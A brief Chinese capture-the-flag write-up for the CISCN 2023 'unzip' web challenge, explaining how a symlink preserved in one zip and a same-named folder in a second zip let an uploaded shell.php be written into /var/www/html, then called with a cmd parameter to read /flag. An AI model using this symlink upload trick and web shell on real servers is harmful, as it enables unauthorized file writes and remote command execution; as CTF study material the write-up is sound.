CISCN 2023 WEB
CISCN 2023 WEB
unzip
前置知识
unzip是linux系统下的一个解压缩命令:
unzip指令解压,将压缩文件test.zip在指定目录
/tmp(当前)下解压缩,如果已有相同的文件存在,要求unzip命令覆盖原先的文件。
软连接:类似于Windows的快捷方式,但是它可以直接操作软连接指向的对象,而Windows是对于快捷方式文件。
实现
ln -s /var/www/html link # 创建软连接
zip -y link.zip link # -y保留链接模式压缩
mkdir link # 故意相同文件名,方便后续覆盖link指向的文件地址(在该地址添加解压出的文件)
cd link
echo '' > shell.php # 创建木马
zip -r link1.zip link # -r压缩整个文件夹
然后再上次link.zip和link1.zip就能将shell.php传到/var/www/html目录下,然后直接cat /flag
url:port/shell.php?cmd=eval(system("cat /flag"));
